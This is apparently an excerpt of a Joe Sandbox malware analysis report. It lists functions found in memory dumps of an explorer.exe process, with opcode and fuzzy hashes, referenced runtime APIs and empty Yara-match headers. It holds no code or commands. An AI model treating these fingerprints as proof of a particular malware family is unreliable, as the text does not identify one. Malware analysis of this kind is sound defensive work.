                                                                                                                                                                                                  • Opcode ID: 6abbea2092d315bd62c974248328d519dfc94f580aacee7d020d41d1c077704f
                                                                                                                                                                                                  • Instruction ID: 8258ba56c45045b2a163bcdfe0f08edf2fb477880bdfbac12c57855f6bcb1fe2
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6abbea2092d315bd62c974248328d519dfc94f580aacee7d020d41d1c077704f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5A211D7A204745C6DB30DF1AE44039E7760F389BA5F054215DF9A07B54DB39D486CB51
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 0C5CD665
                                                                                                                                                                                                  • _errno.LIBCMT ref: 0C5CD65A
                                                                                                                                                                                                    • Part of subcall function 0C5CF5B0: _getptd_noexit.LIBCMT ref: 0C5CF5B4
                                                                                                                                                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0C5CD6AD
                                                                                                                                                                                                  • _errno.LIBCMT ref: 0C5CD6BC
                                                                                                                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 0C5CD6C7
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.3924900127.000000000C5B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0C5B0000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_c5b0000_explorer.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 781512312-0
                                                                                                                                                                                                  • Opcode ID: 0fcd198eab2793f05108f05d6b5dead18827d092d1f4da092f9ee6ce59fd95c9
                                                                                                                                                                                                  • Instruction ID: bda277ffc936f2079ee034041ea2b9d618d5bfd8bc08bf84bd7ad0c65a3d7390
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0fcd198eab2793f05108f05d6b5dead18827d092d1f4da092f9ee6ce59fd95c9
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 40213A7A7057C18ADB205BE594C436A66B0B7C47E4F55433DEA9D87B88CA6CC585CB00
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 0B00CA65
                                                                                                                                                                                                  • _errno.LIBCMT ref: 0B00CA5A
                                                                                                                                                                                                    • Part of subcall function 0B00E9B0: _getptd_noexit.LIBCMT ref: 0B00E9B4
                                                                                                                                                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0B00CAAD
                                                                                                                                                                                                  • _errno.LIBCMT ref: 0B00CABC
                                                                                                                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 0B00CAC7
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.3861811657.000000000AFF0000.00000020.00000001.00020000.00000000.sdmp, Offset: 0AFF0000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_aff0000_explorer.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 781512312-0
                                                                                                                                                                                                  • Opcode ID: 1c2956d99d60b832c07fa447607c07bf5254b43af5ef126b2885591145d94db7
                                                                                                                                                                                                  • Instruction ID: 571cab00dc2651242da8abfef70c0df6f111076bf406438200191927ecdbf221
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1c2956d99d60b832c07fa447607c07bf5254b43af5ef126b2885591145d94db7
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 67210762B243C086FF7C9761959536E62E0F745BE8F544361EAAA07BC8DF6CC5819B00
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.3924900127.000000000C5B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0C5B0000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_c5b0000_explorer.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: lstrlen$CreateThreadlstrcatmallocwsprintf
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2370468470-0
                                                                                                                                                                                                  • Opcode ID: 916c2672cbd5221d9b499c1ec107b634614d447ccb0456695aae5034964bd4cc
                                                                                                                                                                                                  • Instruction ID: 29043796e03423e9b839009c11dfe820245caffd89e704fd098d75c845b8034d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 916c2672cbd5221d9b499c1ec107b634614d447ccb0456695aae5034964bd4cc
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F6119039305B408AEB589FA2AD4075AB7A1FB88FD1F4C4179DE8A43B55EF3CE1858700
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.3924900127.000000000C5B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0C5B0000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_c5b0000_explorer.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: lstrlen$malloc
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3301496367-0
                                                                                                                                                                                                  • Opcode ID: bfd041a110eafc60ec5d33fc1a58297f1223079662442b5d046224c743d08d17
                                                                                                                                                                                                  • Instruction ID: b85b7bfd92ceba3d16ae48e4dbb8333d8e9287c0e43aa32519a6cf95550d90e5
                                                                                                                                                                                                  • Opcode Fuzzy Hash: bfd041a110eafc60ec5d33fc1a58297f1223079662442b5d046224c743d08d17
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A731703A314A8486DB14DFA6E84475AB7A5F788BC9F984129DF8E53B15DF3CE085CB00
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • _malloc_crt.LIBCMT ref: 0C5D3089
                                                                                                                                                                                                    • Part of subcall function 0C5D02E8: malloc.LIBCMT ref: 0C5D0313
                                                                                                                                                                                                    • Part of subcall function 0C5D02E8: Sleep.KERNEL32 ref: 0C5D0326
                                                                                                                                                                                                  • free.LIBCMT ref: 0C5D318A
                                                                                                                                                                                                  • free.LIBCMT ref: 0C5D31A6
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.3924900127.000000000C5B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0C5B0000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_c5b0000_explorer.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: free$Sleep_malloc_crtmalloc
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2523592665-0
                                                                                                                                                                                                  • Opcode ID: 23d6ae9e41ff12712d135cce8f6f922f918409d1247914af9c0fb83ca7197bfd
                                                                                                                                                                                                  • Instruction ID: 40d0ffbf1b7253b95368988fabc98af961cf74dabdccd085312f49c2dba1ff82
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 23d6ae9e41ff12712d135cce8f6f922f918409d1247914af9c0fb83ca7197bfd
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0B51A03A301B4593EB24DF6AE98075A73B0F788B98F454629DF5D47B20EF38C16A8744
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 0C5DBACB
                                                                                                                                                                                                  • _errno.LIBCMT ref: 0C5DBAC0
                                                                                                                                                                                                    • Part of subcall function 0C5CF5B0: _getptd_noexit.LIBCMT ref: 0C5CF5B4
                                                                                                                                                                                                  • _errno.LIBCMT ref: 0C5DBB6E
                                                                                                                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 0C5DBB79
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.3924900127.000000000C5B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0C5B0000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_c5b0000_explorer.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _errno_invalid_parameter_noinfo$_getptd_noexit
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1573762532-0
                                                                                                                                                                                                  • Opcode ID: 7b3655abaedacf09bd73e1ef73c55128fd95c26ea48b30d4aa087944b26974d9
                                                                                                                                                                                                  • Instruction ID: def937b3c5c8086b8cd736f0d3bf0de2fe8dd1e2c7f177f0d5e02ebefe104639
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7b3655abaedacf09bd73e1ef73c55128fd95c26ea48b30d4aa087944b26974d9
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9D417A7EB0239687EF349B1AA0406BA7362F750BD5FDB4215EB8457B98DB38C181C740
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 0B01AECB
                                                                                                                                                                                                  • _errno.LIBCMT ref: 0B01AEC0
                                                                                                                                                                                                    • Part of subcall function 0B00E9B0: _getptd_noexit.LIBCMT ref: 0B00E9B4
                                                                                                                                                                                                  • _errno.LIBCMT ref: 0B01AF6E
                                                                                                                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 0B01AF79
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.3861811657.000000000AFF0000.00000020.00000001.00020000.00000000.sdmp, Offset: 0AFF0000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_aff0000_explorer.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _errno_invalid_parameter_noinfo$_getptd_noexit
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1573762532-0
                                                                                                                                                                                                  • Opcode ID: 7b583b9a57fd17f4dbff173c38f96e8f58c0d522087325801c2f692f53d10127
                                                                                                                                                                                                  • Instruction ID: c51a179a28b0d6af2a983e00d64776b490c60c0b0e10dc2a5b3c8ee157a749c5
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7b583b9a57fd17f4dbff173c38f96e8f58c0d522087325801c2f692f53d10127
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8A4124B2B1239586DFAC9F62D5802BA73E5F740BD4F88491AEBF557684DB38C291C300
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 0C5D781E
                                                                                                                                                                                                  • _errno.LIBCMT ref: 0C5D7813
                                                                                                                                                                                                    • Part of subcall function 0C5CF5B0: _getptd_noexit.LIBCMT ref: 0C5CF5B4
                                                                                                                                                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0C5D789D
                                                                                                                                                                                                  • _errno.LIBCMT ref: 0C5D78AE
                                                                                                                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 0C5D78B9
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.3924900127.000000000C5B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0C5B0000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_c5b0000_explorer.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 781512312-0
                                                                                                                                                                                                  • Opcode ID: 2b48d64ce73cf33d5b9b542f967592c284f768358c259655d1be8448c2b2bd92
                                                                                                                                                                                                  • Instruction ID: a551a5708fc60b87e16a5c1ffd2203d2639211b76324da06ddcf171789dbe959
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2b48d64ce73cf33d5b9b542f967592c284f768358c259655d1be8448c2b2bd92
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0731697BB113A5C2DF349B1A90502BD3360F748BE4BA6422AEBD507A8CE728C191C300
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 0B016C1E
                                                                                                                                                                                                  • _errno.LIBCMT ref: 0B016C13
                                                                                                                                                                                                    • Part of subcall function 0B00E9B0: _getptd_noexit.LIBCMT ref: 0B00E9B4
                                                                                                                                                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0B016C9D
                                                                                                                                                                                                  • _errno.LIBCMT ref: 0B016CAE
                                                                                                                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 0B016CB9
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.3861811657.000000000AFF0000.00000020.00000001.00020000.00000000.sdmp, Offset: 0AFF0000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_aff0000_explorer.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 781512312-0
                                                                                                                                                                                                  • Opcode ID: 8d142ae25fe53c6b8e973e837228db9ed5a0d2aaec68b7a7a522a056c95e5049
                                                                                                                                                                                                  • Instruction ID: 697ef43036be8f02777a97cff4e6c7e307f7cad8ee322a9bbfe6ef65e4cfc1fb
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8d142ae25fe53c6b8e973e837228db9ed5a0d2aaec68b7a7a522a056c95e5049
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0C314AB2A113A186DF6C9B16D9512BD33E1F740FE4FC44926EBE50B784EB2AC551D700
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __DestructExceptionObject.LIBCMT ref: 0B013982
                                                                                                                                                                                                  • __DestructExceptionObject.LIBCMT ref: 0B013A0C
                                                                                                                                                                                                  • _getptd.LIBCMT ref: 0B01395F
                                                                                                                                                                                                    • Part of subcall function 0B0118AC: _getptd_noexit.LIBCMT ref: 0B0118B2
                                                                                                                                                                                                    • Part of subcall function 0B0118AC: _amsg_exit.LIBCMT ref: 0B0118C2
                                                                                                                                                                                                  • _getptd.LIBCMT ref: 0B013A11
                                                                                                                                                                                                  • _getptd.LIBCMT ref: 0B013A1D
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.3861811657.000000000AFF0000.00000020.00000001.00020000.00000000.sdmp, Offset: 0AFF0000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_aff0000_explorer.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _getptd$DestructExceptionObject$_amsg_exit_getptd_noexit
                                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                                  • API String ID: 331613561-1018135373
                                                                                                                                                                                                  • Opcode ID: 6abbea2092d315bd62c974248328d519dfc94f580aacee7d020d41d1c077704f
                                                                                                                                                                                                  • Instruction ID: 0c151060ee9600d2c950c6a40d640566bc6db5c6b38ed1ddccd1404daaf8ead9
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6abbea2092d315bd62c974248328d519dfc94f580aacee7d020d41d1c077704f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 29215E3660468487D73CDF16E44039EB7A0F788BA4F448626CF9913B54CF39E486CB14
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0C5BCEE9
                                                                                                                                                                                                    • Part of subcall function 0C5BE740: std::_Lockit::_Lockit.LIBCPMT ref: 0C5BE756
                                                                                                                                                                                                    • Part of subcall function 0C5BE740: std::_Lockit::~_Lockit.LIBCPMT ref: 0C5BE779
                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 0C5BCF4E
                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0C5BCF58
                                                                                                                                                                                                  • std::bad_exception::bad_exception.LIBCMT ref: 0C5BCF7C
                                                                                                                                                                                                  • _CxxThrowException.LIBCMT ref: 0C5BCF8D
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.3924900127.000000000C5B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0C5B0000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_c5b0000_explorer.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowstd::bad_exception::bad_exception
                                                                                                                                                                                                  • String ID: bad cast
                                                                                                                                                                                                  • API String ID: 3838066056-3145022300
                                                                                                                                                                                                  • Opcode ID: 1f58cbcad0499723ce31d8a6380b7b06f9ce7443f8e9123b454c8a1b1e3dd063
                                                                                                                                                                                                  • Instruction ID: bb3189292134f5115c8e827093bd27c9367e1e196749fc38351182bbbd42d122
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1f58cbcad0499723ce31d8a6380b7b06f9ce7443f8e9123b454c8a1b1e3dd063
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D3114279304F45C1DE14EB56E8803AAA761F7C8BE4F8842259A5D47BA8EE7CE14AC740
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0C5BCFB9
                                                                                                                                                                                                    • Part of subcall function 0C5BE740: std::_Lockit::_Lockit.LIBCPMT ref: 0C5BE756
                                                                                                                                                                                                    • Part of subcall function 0C5BE740: std::_Lockit::~_Lockit.LIBCPMT ref: 0C5BE779
                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 0C5BD01E
                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0C5BD028
                                                                                                                                                                                                  • std::bad_exception::bad_exception.LIBCMT ref: 0C5BD04C
                                                                                                                                                                                                  • _CxxThrowException.LIBCMT ref: 0C5BD05D
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.3924900127.000000000C5B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0C5B0000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_c5b0000_explorer.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowstd::bad_exception::bad_exception
                                                                                                                                                                                                  • String ID: bad cast
                                                                                                                                                                                                  • API String ID: 3838066056-3145022300
                                                                                                                                                                                                  • Opcode ID: 528b27b0e7215fecc2c12ef964503bcb41de3a057b44eb648b0b0da492d48c5d
                                                                                                                                                                                                  • Instruction ID: 46c5319ed76612a4cad25838881dcdac289091b15f923cab84422f76cda85e80
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 528b27b0e7215fecc2c12ef964503bcb41de3a057b44eb648b0b0da492d48c5d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 99118239304F46C1DE04EB56E89039AA761F7C8BE4F484225D99D47BA8EF7CE14AC740
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.3924900127.000000000C5B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0C5B0000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_c5b0000_explorer.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _getptd
                                                                                                                                                                                                  • String ID: MOC$RCC$csm
                                                                                                                                                                                                  • API String ID: 3186804695-2671469338
                                                                                                                                                                                                  • Opcode ID: 7997cc07de5a0b9fe1d06e3a3cd088aa0d5137e088e48fbd6215a328365de7e6
                                                                                                                                                                                                  • Instruction ID: 42f26b359fe101d6171bfce902d5d4cd53feb58c50de728f4aa09c7cdd6ab350
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7997cc07de5a0b9fe1d06e3a3cd088aa0d5137e088e48fbd6215a328365de7e6
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 84E0653E600305CAC7396B6CC5043AC32A0FBD8B1AF9785A19A0147700DBBC4889CE23
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.3861811657.000000000AFF0000.00000020.00000001.00020000.00000000.sdmp, Offset: 0AFF0000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_aff0000_explorer.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _getptd
                                                                                                                                                                                                  • String ID: MOC$RCC$csm
                                                                                                                                                                                                  • API String ID: 3186804695-2671469338
                                                                                                                                                                                                  • Opcode ID: 7997cc07de5a0b9fe1d06e3a3cd088aa0d5137e088e48fbd6215a328365de7e6
                                                                                                                                                                                                  • Instruction ID: ddc745d66e9077f2c5651e024482a76dd8e8412ac90de613fb0b90bd707011c0
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7997cc07de5a0b9fe1d06e3a3cd088aa0d5137e088e48fbd6215a328365de7e6
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 14E01A3A901144EBC76D6BA590463EC36A0FB98B0AFC6DDE6875857310C7BC45848B16
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.3924900127.000000000C5B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0C5B0000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_c5b0000_explorer.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: isdigit
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2326231117-0
                                                                                                                                                                                                  • Opcode ID: 90b00852da28df6c82046a2b6c60c13adba97fd5abf21ce1f3b3af4ee8bb180e
                                                                                                                                                                                                  • Instruction ID: 7f4cb0faff7f0e64666fbe58bd611d57dc1e87496f3f0812cc6b06bdf15f2085
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 90b00852da28df6c82046a2b6c60c13adba97fd5abf21ce1f3b3af4ee8bb180e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7721C53C744A5996FB349B92EC953FE2AEBF700FA1F04462AC54172853EB1CC0D48648
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.3924900127.000000000C5B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0C5B0000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_c5b0000_explorer.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: lstrcatlstrlen$lstrcpymalloc
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3932841890-0
                                                                                                                                                                                                  • Opcode ID: 72d33d8974886c257c2ca5b9be51570f178280123876d2084ba8319bc931329f
                                                                                                                                                                                                  • Instruction ID: 22ca88224ee074ab464f60a6906296af10e2f1f468d6d7fd24b93a3cdda9b881
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 72d33d8974886c257c2ca5b9be51570f178280123876d2084ba8319bc931329f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D401A228702B0582FF48DB52BD54B1AA761FBC8FD1F0C91388D0A07754DE3CE0868700
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.3924900127.000000000C5B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0C5B0000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_c5b0000_explorer.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Pointerabort$DecodeEncode_set_abort_behavior
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2556904055-0
                                                                                                                                                                                                  • Opcode ID: da11c466fb8982ce54f7a997522042ff2a06bc1c8b00337ed4e9437099afdc58
                                                                                                                                                                                                  • Instruction ID: 133807403880e82440ddb7e01bad1ce851e9a1309365d905c8ab342b8696f05e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: da11c466fb8982ce54f7a997522042ff2a06bc1c8b00337ed4e9437099afdc58
                                                                                                                                                                                                  • Instruction Fuzzy Hash: FAF05E3C712F0585FE1C77A4AC957582320FBCAB42F540A28C50E07BE0DE78A1968700
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.3861811657.000000000AFF0000.00000020.00000001.00020000.00000000.sdmp, Offset: 0AFF0000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_aff0000_explorer.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: free$CompareString__crtmalloc
                                                                                                                                                                                                  • String ID: p
                                                                                                                                                                                                  • API String ID: 1736151240-2181537457
                                                                                                                                                                                                  • Opcode ID: 5f8d3eb82e486a5eb4ba1d5c53f7d03f45e796fccc5dad79fb6ee34413f7a797
                                                                                                                                                                                                  • Instruction ID: 7051ecdab89904773e5c5b5917452296882d259bd01edb42a04b6b76ff98255d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5f8d3eb82e486a5eb4ba1d5c53f7d03f45e796fccc5dad79fb6ee34413f7a797
                                                                                                                                                                                                  • Instruction Fuzzy Hash: AA31CE7232074286F7399F59E4407AA77A2F784BA8F444B22DE2D57BE4DF38C1418300
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0C5BD9F2
                                                                                                                                                                                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0C5BDA38
                                                                                                                                                                                                    • Part of subcall function 0C5CCC6C: setlocale.LIBCMT ref: 0C5CCC80
                                                                                                                                                                                                    • Part of subcall function 0C5CCC6C: _Yarn.LIBCPMT ref: 0C5CCC9A
                                                                                                                                                                                                    • Part of subcall function 0C5CCC6C: setlocale.LIBCMT ref: 0C5CCCA9
                                                                                                                                                                                                  • std::bad_exception::bad_exception.LIBCMT ref: 0C5BDA57
                                                                                                                                                                                                  • _CxxThrowException.LIBCMT ref: 0C5BDA68
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.3924900127.000000000C5B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0C5B0000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_c5b0000_explorer.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: setlocalestd::_$ExceptionLocinfo::_Locinfo_ctorLockitLockit::_ThrowYarnstd::bad_exception::bad_exception
                                                                                                                                                                                                  • String ID: bad locale name
                                                                                                                                                                                                  • API String ID: 409252694-1405518554
                                                                                                                                                                                                  • Opcode ID: b2b64cb0f4d027bc5868684a66aea558d7d0a4692b6637d6a8eb43bad466f8a8
                                                                                                                                                                                                  • Instruction ID: 99471f957fdb55f1e4f73d8c31866c1f0b9564bab1693c2cc3bf2829d2e2f6ee
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b2b64cb0f4d027bc5868684a66aea558d7d0a4692b6637d6a8eb43bad466f8a8
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9BF04F7A310946D1CB14FB69DE901EC5735FBD4B88F848431860E569ADFE38CA8AC750
                                                                                                                                                                                                  APIs
